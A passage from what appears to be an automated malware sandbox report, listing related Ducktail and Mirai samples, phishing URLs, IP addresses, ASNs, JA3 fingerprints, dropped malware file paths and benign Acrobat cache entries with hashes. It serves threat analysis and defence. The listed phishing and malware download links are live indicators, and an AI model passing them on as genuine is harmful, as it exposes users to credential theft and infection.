                                                                                  • 172.67.137.62
                                                                                  K05MQ5BcC8.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.86.219
                                                                                  eQwUFcwrXk.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 104.21.86.219
                                                                                  4YgQ2xN41W.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 104.21.86.219
                                                                                  chrome.cloudflare-dns.comhttps://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exeGet hashmaliciousUnknownBrowse
                                                                                  • 172.64.41.3
                                                                                  https://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exeGet hashmaliciousUnknownBrowse
                                                                                  • 172.64.41.3
                                                                                  ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.64.41.3
                                                                                  4YgQ2xN41W.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 162.159.61.3
                                                                                  6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 162.159.61.3
                                                                                  Mediatool-media-planning-guide lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 162.159.61.3
                                                                                  H71PKTiNjk.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 162.159.61.3
                                                                                  YShfqKxCAU.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.64.41.3
                                                                                  X93fnhk2PX.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.64.41.3
                                                                                  XUpERCR9nC.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.64.41.3

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  HYPEENT-SJUSgW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 206.206.126.252
                                                                                  U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 206.206.126.252
                                                                                  ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 206.206.126.252
                                                                                  z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 206.206.126.252
                                                                                  About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 206.206.126.252
                                                                                  Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 206.206.126.252
                                                                                  6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 206.206.126.252
                                                                                  Meeting-Registration pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 206.206.126.252
                                                                                  Mediatool-media-planning-guide lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 206.206.126.252
                                                                                  K9ZFXlZRuI.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 206.206.126.252
                                                                                  CLOUDFLARENETUShttps://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exeGet hashmaliciousUnknownBrowse
                                                                                  • 172.64.41.3
                                                                                  https://support-facebook.kb.help/your-facebook-account-has-been-restricted/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.16.123.96
                                                                                  aQuwmiym51.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 104.21.86.219
                                                                                  https://yo2f2eetmf62.freewebhostmost.com#faren.esau@media24.comGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.18.11.207
                                                                                  gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.67.137.62
                                                                                  U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 104.21.86.219
                                                                                  https://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exeGet hashmaliciousUnknownBrowse
                                                                                  • 172.64.41.3
                                                                                  ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.64.41.3
                                                                                  z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.67.137.62
                                                                                  About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 104.21.86.219
                                                                                  CLOUDFLARENETUShttps://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exeGet hashmaliciousUnknownBrowse
                                                                                  • 172.64.41.3
                                                                                  https://support-facebook.kb.help/your-facebook-account-has-been-restricted/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.16.123.96
                                                                                  aQuwmiym51.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 104.21.86.219
                                                                                  https://yo2f2eetmf62.freewebhostmost.com#faren.esau@media24.comGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.18.11.207
                                                                                  gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.67.137.62
                                                                                  U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 104.21.86.219
                                                                                  https://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exeGet hashmaliciousUnknownBrowse
                                                                                  • 172.64.41.3
                                                                                  ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.64.41.3
                                                                                  z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.67.137.62
                                                                                  About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 104.21.86.219
                                                                                  ZAYO-6461USbyte.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 209.249.87.96
                                                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                                                  • 64.125.72.65
                                                                                  nklarm7.elfGet hashmaliciousUnknownBrowse
                                                                                  • 64.125.242.135
                                                                                  nklarm5.elfGet hashmaliciousUnknownBrowse
                                                                                  • 64.125.242.132
                                                                                  la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                  • 209.133.72.134
                                                                                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                  • 178.237.127.253
                                                                                  https://talentrecruting.com/?Y3w2MDkxNzZ8d190cmF1MTEwRHx8fA0KfHxicnlhbi50LmJlYmJAc2FpYy5jb20=Get hashmaliciousUnknownBrowse
                                                                                  • 209.133.56.117
                                                                                  la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                  • 167.217.189.37
                                                                                  https://qrco.de/bfSzSwGet hashmaliciousUnknownBrowse
                                                                                  • 23.41.168.139
                                                                                  na.elfGet hashmaliciousMiraiBrowse
                                                                                  • 167.217.255.72

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  3b5074b1b5d032e5620f69f9f700ff0ehttps://support-facebook.kb.help/your-facebook-account-has-been-restricted/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 172.67.137.62
                                                                                  aQuwmiym51.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.67.137.62
                                                                                  gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.67.137.62
                                                                                  U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.67.137.62
                                                                                  ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.67.137.62
                                                                                  z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.67.137.62
                                                                                  About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.67.137.62
                                                                                  Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.67.137.62
                                                                                  K05MQ5BcC8.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.137.62
                                                                                  eQwUFcwrXk.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.67.137.62

                                                                                  Dropped Files

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  C:\Windows\Temp\svczHost.exeaQuwmiym51.lnkGet hashmaliciousDucktailBrowse
                                                                                    gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                                      U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                                        ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                                          z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                                            About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                              Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                                K05MQ5BcC8.lnkGet hashmaliciousUnknownBrowse
                                                                                                  eQwUFcwrXk.lnkGet hashmaliciousDucktailBrowse
                                                                                                    4YgQ2xN41W.lnkGet hashmaliciousDucktailBrowse
                                                                                                      C:\Windows\Temp\myRdpService.exeaQuwmiym51.lnkGet hashmaliciousDucktailBrowse
                                                                                                        gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                                                          U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                                                            ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                                                              z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                                                                About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                                                  Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                                                    6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                                                                                      Meeting-Registration pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                                                        Mediatool-media-planning-guide lnk.lnkGet hashmaliciousDucktailBrowse

                                                                                                                          Created / dropped Files

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):209
                                                                                                                          Entropy (8bit):5.253087978231199
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lvns8RzYOCGLvHkWBGKuKjXKLNjKLuVGH5kt1llh/lln/iTFJrqzOJkvP5m91:men9YOFLvEWdM9QNH6trll/i7Z+P4
                                                                                                                          MD5:60C71BC6B5239F9F11ADD2D8AE485A05
                                                                                                                          SHA1:80B5E4AB028A3816D989DFC897BF823DED20BBA7
                                                                                                                          SHA-256:E9791FB0C47237AB964B2F9044B8216E661B2A908B53EFB4558CD5A45FBE772A
                                                                                                                          SHA-512:61D8B1AB0B9F6DC0AE5EA3800F45DF61AD65D5E9735017C44EC99970FAE3328506500FC347C636C746EBBC4D901F98ED7B706A1A4EBCA2204CDAE194A0FCB95F
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js ..A..Eo...................................*"J............d.{v.^.G...d.W.:...P..k%..A..Eo......O.aY........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\076dd576a8178299_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):220
                                                                                                                          Entropy (8bit):5.275989999738576
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:mzYO6LvEwQlRmV4RQEbH6tUYApZeByMAof:gOQKoaqYAIN
                                                                                                                          MD5:0E36E5FBF79A79F117007E97EB0E4C4D
                                                                                                                          SHA1:09523A5D65EFFF329B8697B1019F723403B2B8C6
                                                                                                                          SHA-256:DE21DC49A6AABAF15448B567A0439000E7F49AE3A5465F991B996A6DE40D6943
                                                                                                                          SHA-512:0F6B96BB228D408F867EE7FFA721AA4988837AB49304E4AA47B3DF281F7B15BB61DD146C2AF4D209AD4BB45E23BB451600B5D5AC3429C71079C19E74CAB42C68
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......X....,......_keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/bootstrap.js ..A..Eo...................................*"J............v5.G..sk.`.....q....O...M9...A..Eo.......ns.........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):178
                                                                                                                          Entropy (8bit):5.102821002664344
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lF9NX6v8RzYOCGLvHktWV9kH5kt1llhdtED98fZe/O+/rkwGhkg4mA/llll:mi9NqEYOFLvEkXkH6twZ8Be7YwcrA
                                                                                                                          MD5:462FFF5843CAD0408BF0BBF1FD6725CA
                                                                                                                          SHA1:BBF8754396FE254E24E3A0AD7BF50962C169899D
                                                                                                                          SHA-256:93649B44BACF580FEE5581C4218A8FDF1216D314195ED9121972F58605C49643
                                                                                                                          SHA-512:5BBB8EC3AEB0326091724FF7392026711602EE83D8D52B809B1241F3A746393EEF1FE74DD6873303FDF6CCD2F1F289E855F828D1AF69CC821434AD62889C15E9
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m............,....._keyhttps://rna-resource.acrobat.com/init.js ..A..Eo...................................*"J`........1.x.'.vI..*|Z..o...+.4....0..A..Eo......i+..........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):250
                                                                                                                          Entropy (8bit):5.264324492780132
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:mMyEYOFLvEWdVFLBKFjVFLBKFlQhu0H6tNgt/RlUoSjGY2J:DyeRVFAFjVFAFQazgtZlUo6OJ
                                                                                                                          MD5:224F486FD2EF74738C9F7D3D0BA4E01D
                                                                                                                          SHA1:AA9B93C89A3F0BCCDAE79CD5AB1B5D9214E1337A
                                                                                                                          SHA-256:26FA4651D17CD19A61DE122D24A188B30F9475369519F70135F06ACC649DDEDE
                                                                                                                          SHA-512:580335C80EBFD29277451AB380A67D2EAC76FC44A41194D7DCC3E952084D77BDFD05DE2761B0CE20C1E866AA33B0C90A8E4F4C108F663DB633F1B55510074D46
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......v...n......._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/selector.js ..A..Eo...................................*"J..........hvDO.N.t@.....n.*...... ....A..Eo..................

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0a71ed411241f66a_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):198
                                                                                                                          Entropy (8bit):5.312589687614656
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lyI5a8RzYOjGLvHkRzNrgG9gWBH5kt1llh+YXl/qeW1pkgmlEXll:mG5YO6LvEV5goTBH6tCYXEeuKlE
                                                                                                                          MD5:67C34CA3490F693D185FCC014DA36DD2
                                                                                                                          SHA1:650E9A60C98D006DA46112399CA13042CFA1EA9A
                                                                                                                          SHA-256:0E59B2CAAA39560621A1953B5E9FC055525FFF7CBA02831DC6E3BABFA2E6B118
                                                                                                                          SHA-512:3F48164B88E31E2304E30D99471FEB1B4190A6D376E862A95B6EA9834D45480CF79E529A77DBA14D22B96707B6519B3A1FB81E858B0A2D0C93389651265F6B8C
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......B...-..T...._keyhttps://rna-v2-resource.acrobat.com/__VERSION__/dc-extras.js ..A..Eo...................................*"JC.......Z....m.r*.........h..3K..[..@D.A..Eo......{aW.........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0b05805acd0d1882_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):196
                                                                                                                          Entropy (8bit):5.270842689796744
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lWCVv8RzYOjGLvHkRzNrgG7KAH5kt1llhG1sVgBYmbzUmrGAllt:mEVEYO6LvEV5gu3H6tCSKum/rGAll
                                                                                                                          MD5:D24CE66072CEF09901A642C3EBF99DA6
                                                                                                                          SHA1:6C67DF690E0BC236937512B92D33289AF59AACF5
                                                                                                                          SHA-256:004488D557E01954E95CEBA5A1C7080675C5F988AC666F4501E71EBBAF2EE2DC
                                                                                                                          SHA-512:7097A456E33838893D6469B679C7E9E472E3FE214E1B3C1C9800D7A358C6FAEF6A353C4F68EE399D708078138A9A89DD4336DEBEBE5431146CF6ACED4C2717EA
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......@.........._keyhttps://rna-v2-resource.acrobat.com/__VERSION__/dc-core.js ..A..Eo...................................*"J........"....E\..8..$}..<D bg...\.%+..*..A..Eo......X.c.........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0c8edd501377e254_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):221
                                                                                                                          Entropy (8bit):5.3804550067978925
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:mavHYO6LvEwQlRmVH0tu0H6ts1iU/NvonXZ:pOQKIu0aIiU/N
                                                                                                                          MD5:EBD2DA813E7B8ABDC41942208805E7F9
                                                                                                                          SHA1:2BE50223898F46506166C04A8D85A8659858E91A
                                                                                                                          SHA-256:4F34126DDF5F4C0F540F90A5CCD87D59C9C19BDDA4D9130B93215941ECF5CAA5
                                                                                                                          SHA-512:814215E337C0A85B01FDBC951E28255B2E0F38776575DB5C2DE7F9BF0D6190959D778649B5CFC46B3337A53FA71E6CB8D65BD48F5ECCBCEF18F3DE825C74ED60
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......Y...#......._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/5450-chunk.js ..A..Eo...................................*"J........r........$.r.....U...+cC...4?.A..Eo.......hb........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):214
                                                                                                                          Entropy (8bit):5.154600131256294
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:m+yiXYOFLvEWd7VIGXVu0H6tvVVyh9PT4xc:pyixRuyaRVV41T
                                                                                                                          MD5:7215B9965CE748BFBE80A88D128B711E
                                                                                                                          SHA1:00FB582744F09A596231BD26F0176C938E4792C3
                                                                                                                          SHA-256:7C3A2F7C2A1380A1F8A82DD35371763934AFFBC53DAF9F7D9AF7241CEDFF1572
                                                                                                                          SHA-512:1C144C60494B46AC90249E744932E537A383AEC084C2B27CF36E5BBA1AA1E5319CF9CAC025713B9711D4A457110155461CA9EB700BD6B0D3DD78F14679D808EF
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......R...kP]g...._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/selector.js ..A..Eo...................................*"J........k.Q.....-_..y.....O...>..1....A..Eo........:m........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\13121e710409f773_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):221
                                                                                                                          Entropy (8bit):5.382221339492748
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:mast6EYO6LvEwQlRmVU5ku0H6tJW8ozr:I9OQKS5ku0a68
                                                                                                                          MD5:4AB32F617D739A2CBAAE4CE085928311
                                                                                                                          SHA1:2246145BF9D93607E6FF0075ABEC72F6FD829A99
                                                                                                                          SHA-256:17E7DFC29374B306A30C91FF6D529C5B81776E798E44A43E12F6E90DF6F1D09B
                                                                                                                          SHA-512:E18A17C3475F0F64CF54DA601446C61D6C605A500CE171E6310D63BF9CD03606996CFEB4BE21FBC045E982DEC2CB9639C2FF0627CDE15E8A23CBAC078EE10BD7
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......Y...K..$...._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/2241-chunk.js ..A..Eo...................................*"J.........q@...`k...5(......Y}.c<....W...A..Eo.........5........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\1bc86f24c60da374_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):221
                                                                                                                          Entropy (8bit):5.420186767210228
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lze//lA8RzYOjGLvHkwIBIXeRmBVtu0H5kt1llhw/lNgdN7YL0p4mF7Gtt:maOPYO6LvEwQlRmVtu0H6tRbF7
                                                                                                                          MD5:7CC327F1DE859F1CA0CD0053462CAB29
                                                                                                                          SHA1:29B505002FFF506B8294111812473679F4CD820C
                                                                                                                          SHA-256:CF133FD5640AD84F54F8C4AFEFC0B8C96D39B0859D5D5F22C1ACBB962E654704
                                                                                                                          SHA-512:4AF4A18F8A368D98C2BBB6AEE0D0DC02AE6A3B1E190F88A9027E33C8F073FEEFF2185DB534F731AB7EF4BF6FFCC312E53AFB19078B3375823841446CB38D3A83
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......Y...1..C...._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/4782-chunk.js ..A..Eo...................................*"J'.......(+.......(...q..2.W.;......B..A..Eo..................

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):220
                                                                                                                          Entropy (8bit):5.2614848233501945
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lifll08RzYOCGLvHkWBGKuKjXKoyNjXKLuVGH5kt1llhS//nlYo2sZI8xeGvPw:mvYOFLvEWdhwjQNH6ts3ZIl6P4nF
                                                                                                                          MD5:B2BB004B2F0D01782BA8AE00E903E94F
                                                                                                                          SHA1:9617E9B39EB09E9DB749A26C8ED390CBBAE2C5E0
                                                                                                                          SHA-256:63C1154F577ACA6EDA9057708DF21576D6BC0349B1AF575351662D2BBCBE0953
                                                                                                                          SHA-512:CEE681281C27B958DC9A67ED229E5A77C01F63E06BD8D3604E4861DF2906C1E82DABE2F13DCC29F6028F8E295BD4ECC0E4A4A65FB0891FE442CE3997F1726D08
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......X.....V....._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/plugin.js ..A..Eo...................................*"J.........].>....uUf..N...k......c..l.A..Eo........s.........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\25227e55d9136cbc_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):221
                                                                                                                          Entropy (8bit):5.311883290134531
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:maiXYO6LvEwQlRmVLeku0H6tH9Vr1xnK4j/ll:cOQKru0aTl//
                                                                                                                          MD5:8727E9760FF96454F5EBE6362A877866
                                                                                                                          SHA1:8B2C8D333187E963B786D2A2F1C984D5E6422595
                                                                                                                          SHA-256:FE2DB0191E43F123866D879CAFE28CF62CC5BFBD235DC5656A31D97010933B3E
                                                                                                                          SHA-512:0A02F84EF0C7F0BB42070CD8DF4A141A330F58968FDC3AA6C5FFA24F754F5C43791C843DDEEFF9D12681D490310B02544C8275DE42C57D1C5F6112158F300C4F
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......Y....qI...._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/7347-chunk.js ..A..Eo...................................*"J.........P.>..X.t\n....&k..)n....ry..P..A..Eo......v...........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):213
                                                                                                                          Entropy (8bit):5.149203352712848
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lZd8RzYOCGLvHkWBGKuKjXKX7KoQRA/KVdKLuVGH5kt1llhalrPcyxMtv9EWmR:mJYOFLvEWdGQRQOdQNH6tKrD6gH
                                                                                                                          MD5:D14FD5F5CB02A6E0664F22B17622467E
                                                                                                                          SHA1:BA0CA64483B3FF2FB7B76C7A2DF1D8071B7811B3
                                                                                                                          SHA-256:AAAC576FE3601B5AB7666E5D9B5BB2708638C95629C84BB12197C090739F0040
                                                                                                                          SHA-512:3BCE31142E475D52CE9E8ED30D958043CF6E4F3F0D5E928B62B3CCD33B95840261CAACA1721A297B3CB98FD257E62E0497765ADF0382C026670D69E97CAD2EE4
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......Q..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/plugin.js ..A..Eo...................................*"J..........c..y/L....|y.n..C/I.....X7-ne.A..Eo......}../........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):183
                                                                                                                          Entropy (8bit):5.102597689723179
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lLp08RzYOCGLvHkfaMMuVGH5kt1llhcnmcQMWqg4nRb7om5mA7/t:mOYOFLvECMLGH6tgmNuR/4U
                                                                                                                          MD5:42800B25A6B7FE25887D9D10D69FDDAB
                                                                                                                          SHA1:4535E4E1ECACD82DDD2CC3AAF9B070291B008EFA
                                                                                                                          SHA-256:131F7881901DE9BDC31DA6C85084EB73552E7F3B67984E8CEED4D25BAC354739
                                                                                                                          SHA-512:93C7E3C00F06791D29ACD839922DF0BDBBAECB9364DAF85AEB30A218CD0E23C6A337CE9ACF4C951E0333E6BC132169222868DC78783D0A5F955C98304D67EDF7
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......3....<lb...._keyhttps://rna-resource.acrobat.com/base_uris.js ..A..Eo...................................*"Ja........y...L<?W.Xi..A\Q3...J.}...d..~G.A..Eo.......+<.........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\357f987da675909e_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):221
                                                                                                                          Entropy (8bit):5.351321242554691
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:maZmEYO6LvEwQlRmVlXu0H6teRgD9kP4rr:seOQKzXu0aggOu
